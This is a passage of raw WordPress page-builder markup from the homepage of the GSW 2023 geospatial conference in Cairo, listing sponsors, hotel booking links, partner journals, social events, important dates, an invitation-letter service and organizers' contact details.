Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 